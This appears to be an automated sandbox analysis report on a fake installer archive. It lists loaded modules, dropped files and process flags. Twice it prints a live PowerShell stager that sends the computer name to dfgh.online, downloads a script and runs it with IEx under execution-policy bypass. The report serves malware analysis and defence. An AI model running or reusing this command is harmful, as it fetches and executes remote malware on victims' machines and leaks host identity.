Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior

Source: C:\Program Files\7-Zip\7zG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: installer_1.05_36.4.zip

Static file information: File size 18790457 > 1048576

Source:	Binary string: C:\work\mesa\git\mesa\build\windows-x86_64\gallium\targets\libgl-gdi\opengl32.pdbu source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.2167934211.00000000088FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\SFX\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar-x64.exe
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAES_ASM -DVPAES_ASM -DBSAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
Source:	Binary string: System.Management.Automation.pdbqZ source: powershell.exe, 0000001E.00000002.2316088773.00000000032E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\SFX\setup\build\sfxrar64\Release\sfxrar.pdb+ source: winrar-x64.exe
Source:	Binary string: %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%cuser + domain + host name too bigcompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAES_ASM -DVPAES_ASM -DBSAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
Source:	Binary string: CrashReportClient.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD078E000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
Source:	Binary string: C:\work\mesa\git\mesa\build\windows-x86_64\gallium\targets\libgl-gdi\opengl32.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.2316088773.00000000032E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.10.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;			Jump to behavior

Source: installer_1.05_36.4.exe.10.dr

Static PE information: real checksum: 0x10f683 should be: 0x1145f0

Source: vcruntime140.dll.10.dr	Static PE information: section name: _RDATA
Source: opengl32sw.dll.10.dr	Static PE information: section name: _RDATA
Source: opengl64.dll.10.dr	Static PE information: section name: .uedbg
Source: opengl64.dll.10.dr	Static PE information: section name: _RDATA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_087EE001 push dword ptr [esp+ecx-75h]; iretd	28_2_087EE00F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_088821B5 push ebp; retf	28_2_088821B6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08882316 push eax; retf	28_2_0888231F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08882328 push eax; retf	28_2_0888232A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08882C05 pushad ; retf	28_2_08882C19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08883DEC pushad ; retf	28_2_08883DF6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08883DFE pushad ; retf	28_2_08883DFF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08882672 push FFFFFFE8h; ret	28_2_08882679
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B5256C push FFFFFF8Bh; ret	28_2_08B5256F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B57E48 push 34418B08h; ret	28_2_08B57F73
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B9814D push FFFFFFC3h; ret	28_2_08B982C6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B992F3 push FFFFFF8Bh; retf	28_2_08B99306
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B9A4B3 push esp; retf	28_2_08B9A4C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B985D2 push eax; mov dword ptr [esp], edx	28_2_08B985E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B9A548 pushad ; retf	28_2_08B9A581
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08C9D080 push 08418B08h; ret	28_2_08C9D0C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D1A1F8 pushfd ; ret	28_2_08D1A1F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D11211 push eax; mov dword ptr [esp], edx	28_2_08D11224
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D1B750 push eax; iretd	28_2_08D1B751
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D3A218 pushfd ; ret	28_2_08D3A219
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D61018 push eax; mov dword ptr [esp], edx	28_2_08D6102C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D629D1 push eax; mov dword ptr [esp], edx	28_2_08D629E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D67EE4 push esp; retf	28_2_08D67EF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DC18C0 push 8BD88B08h; retf	28_2_08DC18C5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DD6181 push eax; mov dword ptr [esp], edx	28_2_08DD6194
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DDCCD8 push eax; mov dword ptr [esp], edx	28_2_08DDCCEC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DD5C70 push eax; mov dword ptr [esp], edx	28_2_08DD5C84
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_082E239D push ebp; retf	30_2_082E239E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_082F0CF0 push eax; retf	30_2_082F0CF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_082F0022 pushad ; ret	30_2_082F0031
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_082F1080 push FFFFFFC3h; ret	30_2_082F109A

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Jump to dropped file

Source: C:\Program Files\7-Zip\7zG.exe	File created: C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1049.dll	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	File created: C:\Users\user\Desktop\installer_1.05_36.4\vcruntime140.dll	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	File created: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	File created: C:\Users\user\Desktop\installer_1.05_36.4\opengl64.dll	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	File created: C:\Users\user\Desktop\installer_1.05_36.4\opengl32sw.dll	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	File created: C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1058.dll	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	File created: C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
